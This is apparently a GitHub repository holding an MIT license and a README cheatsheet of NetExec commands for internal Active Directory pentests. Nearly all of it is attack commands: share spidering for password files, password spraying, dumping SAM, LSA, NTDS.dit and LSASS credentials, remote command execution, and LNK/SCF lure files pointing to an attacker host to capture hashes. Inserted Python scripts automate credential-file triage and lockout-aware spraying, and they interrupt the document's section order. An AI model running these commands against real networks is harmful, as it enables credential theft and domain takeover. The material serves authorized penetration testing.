/LICENSE:

MIT License

Copyright (c) 2024 BlackWasp

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

/README.md:

# NetExec Cheatsheet

A quick and dirty cheatsheet on the usage of [NetExec](https://github.com/Pennyw0rth/NetExec), without lengthy explanations, only commands. The purpose of this page is to provide the basic commands for the essential operations during an internal pentest.

If you need more detailed documentation, please refer to the [**official NetExec wiki**](https://www.netexec.wiki/).
And obviously, if you need more complete cheatsheets with most of the attacks to perform in Active Directory environments, take a look at [my other content](https://hideandsec.sh/books/cheatsheets-82c).

## Enumeration

### Network

`netexec smb $TARGETS`

### Shares

`netexec smb $TARGETS -u $USERNAME -p $PASS --shares`

### Specific files in shares

`spider_plus` is a module for searching network shares. Running the module without any options (on a /24, for example) produces one JSON file per server, listing every file found (with some metadata such as size and timestamps) but not its contents. Then grep on extensions (conf, ini, ...) or names (password, ...) to identify the interesting files to retrieve:

`netexec smb $TARGETS -u $USERNAME -p $PASS -M spider_plus`

Then, once a lot of interesting files have been identified, to speed up the search, dump them to the attacker machine by adding the `-o READ_ONLY=False` option after `-M spider_plus` (but avoid doing this on a /24, otherwise it will take a long time). In this case, NetExec creates a folder named after the machine's IP, with all the folders/files in it. Module option names have changed between releases (recent NetExec versions use `DOWNLOAD_FLAG=True` for the same purpose), so if the option is not recognised, check `netexec smb -M spider_plus --options`.
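Triage of the spider_plus JSON output, as an added example that is not part of this cheatsheet or of NetExec. It assumes the layout spider_plus writes to `~/.nxc/modules/nxc_spider_plus/<ip>.json` (share -> file path -> metadata with a `size` field); the sample JSON, the extension list and the name fragments are constructed, and the function names are mine.

```python
import json
from typing import Dict, Iterable, List, Tuple

# Constructed sample in the layout spider_plus writes to
# ~/.nxc/modules/nxc_spider_plus/<ip>.json (assumed: share -> path -> metadata).
SAMPLE_SPIDER_PLUS_JSON = json.dumps({
    "IT$": {
        "scripts/backup.ps1": {"size": "2.1 KB", "mtime_epoch": "2024-03-01 10:00:00"},
        "scripts/old/svc_passwords.txt": {"size": "311 B", "mtime_epoch": "2023-11-12 08:30:00"},
        "docs/readme.md": {"size": "1.0 KB", "mtime_epoch": "2024-01-05 12:00:00"},
    },
    "SYSVOL": {
        "corp.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml":
            {"size": "1.8 KB", "mtime_epoch": "2022-06-30 09:12:44"},
        "corp.local/scripts/logon.bat": {"size": "420 B", "mtime_epoch": "2022-06-30 09:12:44"},
    },
    "Public": {
        "holiday_party.jpg": {"size": "3.2 MB", "mtime_epoch": "2023-12-20 17:45:00"},
        "web.config": {"size": "4.5 KB", "mtime_epoch": "2024-02-02 14:00:00"},
    },
})

# Extensions and name fragments worth a look (my own lists, extend to taste).
INTERESTING_EXTENSIONS = {"conf", "config", "ini", "xml", "ps1", "bat", "vbs", "kdbx", "txt", "env", "pem", "key"}
INTERESTING_NAME_PARTS = ("passw", "cred", "secret", "unattend", "sysprep", "groups.xml", "id_rsa")


def triage_spider_plus(json_text: str,
                       extensions: Iterable[str] = INTERESTING_EXTENSIONS,
                       name_parts: Iterable[str] = INTERESTING_NAME_PARTS) -> List[Tuple[str, str, str]]:
    """Return (share, path, size) for files matching an interesting extension or name fragment."""
    data: Dict[str, Dict[str, dict]] = json.loads(json_text)
    hits = []
    for share, files in data.items():
        if not isinstance(files, dict):
            continue
        for path, meta in files.items():
            name = path.rsplit("/", 1)[-1].lower()
            ext = name.rsplit(".", 1)[-1] if "." in name else ""
            if ext in extensions or any(part in name for part in name_parts):
                size = meta.get("size", "?") if isinstance(meta, dict) else "?"
                hits.append((share, path, size))
    return sorted(hits)


def build_spider_plus_cmd(targets: str, username: str, password: str, download: bool = False) -> List[str]:
    """argv for the spider_plus run. download=True adds READ_ONLY=False as on this page
    (recent NetExec releases use DOWNLOAD_FLAG=True instead; check -M spider_plus --options)."""
    cmd = ["netexec", "smb", targets, "-u", username, "-p", password, "-M", "spider_plus"]
    if download:
        cmd += ["-o", "READ_ONLY=False"]
    return cmd


if __name__ == "__main__":
    for share, path, size in triage_spider_plus(SAMPLE_SPIDER_PLUS_JSON):
        print(f"{share:8} {size:>8}  {path}")
    print(" ".join(build_spider_plus_cmd("10.0.0.0/24", "jdoe", "Summer18")))
```

Run the listing pass on the whole range first, triage the JSON files offline, then re-run the module with the download option against only the hosts and shares that produced hits.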
`netexec smb $TARGETS -u $USERNAME -p $PASS -M spider_plus -o READ_ONLY=False`

### Sessions

`netexec smb $TARGETS -u $USERNAME -p $PASS --sessions`

### Disks

`netexec smb $TARGETS -u $USERNAME -p $PASS --disks`

### Users

Logged on: `netexec smb $TARGETS -u $USERNAME -p $PASS --loggedon-users`

Domain: `netexec smb $TARGETS -u $USERNAME -p $PASS --users`

Via RID cycling: `netexec smb $TARGETS -u $USERNAME -p $PASS --rid-brute`

### Groups

Domain: `netexec smb $TARGETS -u $USERNAME -p $PASS --groups`

Local: `netexec smb $TARGETS -u $USERNAME -p $PASS --local-groups`

### Password policy

`netexec smb $DC -u $USERNAME -p $PASS --pass-pol`

Read this before spraying: the lockout threshold and the observation window decide how many passwords can be tried per account per window.

## Check credentials

### User + pass

`netexec smb $TARGETS -u $USERNAME -p $PASS`

### User + hash

`netexec smb $TARGETS -u $USERNAME -H 'LM:NT'`

`netexec smb $TARGETS -u $USERNAME -H 'NTHASH'`

### Null session

`netexec smb $TARGETS -u '' -p ''`

### Password spraying

Each command below makes one authentication attempt per user and password, so the number of passwords tried per observation window must stay below the lockout threshold from `--pass-pol`.

`netexec smb $TARGET -u $USERNAME user2 user3 -p Summer18`

`netexec smb $TARGET -u $USERNAME -p $PASS1 $PASS2 $PASS3`

`netexec smb $TARGET -u /path/to/users.txt -p Summer18`

`netexec smb $TARGET -u $USERNAME -p /path/to/passwords.txt`

The last form tries every password against a single account and will lock it out unless the policy allows it.

By default NetExec stops at the first valid credential for a target. To continue spraying after a success:

`netexec smb $TARGET -u /path/to/users.txt -p Summer18 --continue-on-success`

### Local authentication

Authenticate with a local (SAM) account instead of a domain account:

`netexec smb $TARGETS -u $USERNAME -p $PASS --local-auth`

## Dump credentials

### SAM

`netexec smb $TARGETS -u $USERNAME -p $PASS --sam`

### LSA

`netexec smb $TARGETS -u $USERNAME -p $PASS --lsa`

### NTDS.dit

Requires an account with replication rights (Domain Admin in practice). The `vss` method creates a shadow copy on the DC and is noisier than the default DRSUAPI replication.

`netexec smb $DC -u $USERNAME -p $PASS --ntds #Via DRSUAPI (RPC, default)`

`netexec smb $DC -u $USERNAME -p $PASS --ntds vss #Via VSS`
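Password spraying with the lockout policy in mind, as an added example that is not part of this cheatsheet or of NetExec. The planner spaces the rounds so that every account sees fewer bad attempts than the lockout threshold per observation window (both values come from `--pass-pol`), and the parser classifies NetExec result lines into valid, admin (`Pwn3d!`) and locked-out accounts. The `[+]`/`[-]` line layout and the `STATUS_ACCOUNT_LOCKED_OUT` text are NetExec's; the sample output is constructed and the function names are mine.

```python
import re
import subprocess
import time
from typing import Dict, List, Tuple

ANSI = re.compile(r"\x1b\[[0-9;]*m")
# NetExec result line: PROTO  IP  PORT  HOSTNAME  [+|-] DOMAIN\user:secret [status]
RESULT_LINE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[(?P<flag>[+-])\]\s+(?P<msg>.*)$"
)

# Constructed sample of what one spraying round prints.
SAMPLE_OUTPUT = r"""
SMB         10.0.0.5        445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    DC01             [-] corp.local\alice:Summer18 STATUS_LOGON_FAILURE
SMB         10.0.0.5        445    DC01             [+] corp.local\bob:Summer18
SMB         10.0.0.5        445    DC01             [-] corp.local\carol:Summer18 STATUS_ACCOUNT_LOCKED_OUT
SMB         10.0.0.5        445    DC01             [+] corp.local\dave:Summer18 (Pwn3d!)
"""


def plan_spray(passwords: List[str], lockout_threshold: int, observation_window_min: int,
               margin: int = 1) -> List[Tuple[str, int]]:
    """One password per round against every user. After (threshold - margin) rounds, sleep the
    observation window so badPwdCount resets before the next round. threshold 0 means no lockout.
    Returns [(password, seconds_to_sleep_before_this_round)]."""
    if lockout_threshold <= 0:
        return [(pw, 0) for pw in passwords]
    per_window = max(1, lockout_threshold - margin)
    return [(pw, observation_window_min * 60 if i and i % per_window == 0 else 0)
            for i, pw in enumerate(passwords)]


def build_spray_cmd(targets: str, users_file: str, password: str) -> List[str]:
    """argv for one round; --continue-on-success keeps going after the first hit."""
    return ["netexec", "smb", targets, "-u", users_file, "-p", password, "--continue-on-success"]


def parse_nxc_output(text: str) -> Dict[str, object]:
    """Classify NetExec result lines: valid creds, admin (Pwn3d!) creds, locked-out accounts."""
    result = {"valid": [], "admin": [], "locked_out": [], "failed": 0}
    for raw in text.splitlines():
        m = RESULT_LINE.match(ANSI.sub("", raw).strip())
        if not m:
            continue
        msg = m["msg"]
        cred = msg.split(" ", 1)[0]           # DOMAIN\user:secret (passwords with spaces not handled)
        if "\\" not in cred or ":" not in cred:
            continue                          # not an authentication result line
        entry = (m["ip"], cred)
        if m["flag"] == "+":
            result["valid"].append(entry)
            if "(Pwn3d!)" in msg:
                result["admin"].append(entry)
        elif "STATUS_ACCOUNT_LOCKED_OUT" in msg:
            result["locked_out"].append(entry)
        else:
            result["failed"] += 1
    return result


def run_spray(targets: str, users_file: str, passwords: List[str],
              lockout_threshold: int, observation_window_min: int) -> Dict[str, object]:
    """Execute the plan (calls netexec, so not exercised offline). Stops if any account locks out."""
    totals = {"valid": [], "admin": [], "locked_out": [], "failed": 0}
    for password, sleep_s in plan_spray(passwords, lockout_threshold, observation_window_min):
        if sleep_s:
            time.sleep(sleep_s)
        out = subprocess.run(build_spray_cmd(targets, users_file, password),
                             capture_output=True, text=True).stdout
        part = parse_nxc_output(out)
        for key in ("valid", "admin", "locked_out"):
            totals[key] += part[key]
        totals["failed"] += part["failed"]
        if part["locked_out"]:
            break                             # policy was wrong or someone else is spraying: stop
    return totals


if __name__ == "__main__":
    for pw, wait in plan_spray(["Summer18", "Winter18", "Spring19", "Autumn19", "Company2019"], 5, 30):
        print(f"sleep {wait:5d}s then spray {pw}")
    print(parse_nxc_output(SAMPLE_OUTPUT))
```

The margin of one attempt below the threshold leaves room for a user mistyping their own password during the window; a locked-out line during a round is treated as a stop signal rather than noise, since it means the policy read from `--pass-pol` does not match what the DC enforces.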
### LSASS

`netexec smb $TARGET -u $USERNAME -p $PASS -M lsassy`

`netexec smb $TARGET -u $USERNAME -p $PASS -M nanodump`

`netexec smb $TARGET -u $USERNAME -p $PASS -M mimikatz`

`netexec smb $TARGET -u $USERNAME -p $PASS -M procdump`

### LAPS password

`netexec ldap $DC -u $USERNAME -p $PASS -M laps -o computer=$TARGET`

## Command execution

Both forms require local administrator rights on the target.

### Via CMD

`netexec smb $TARGET -u Administrator -p $PASS -x whoami`

### Via PowerShell

`netexec smb $TARGET -u Administrator -p $PASS -X '$PSVersionTable'`

## Write a leak file

Both modules drop a file on the writable shares that points to the attacker's host, so that users browsing the share authenticate to it (to be captured or relayed). Module options go together after a single `-o`: `NAME` is the file name to write, and `CLEANUP=True` removes the file afterwards.

### LNK

`netexec smb $TARGETS -u $USERNAME -p $PASS -M slinky -o SERVER=$ATTACKER_IP NAME=`

### SCF

`netexec smb $TARGETS -u $USERNAME -p $PASS -M scuffy -o SERVER=$ATTACKER_IP NAME=`

## Check for known CVEs

### ZeroLogon

`netexec smb $DC -u '' -p '' -M zerologon`

### PetitPotam

`netexec smb $DC -u '' -p '' -M petitpotam`

### noPAC

`netexec smb $DC -u $USERNAME -p $PASS -M nopac`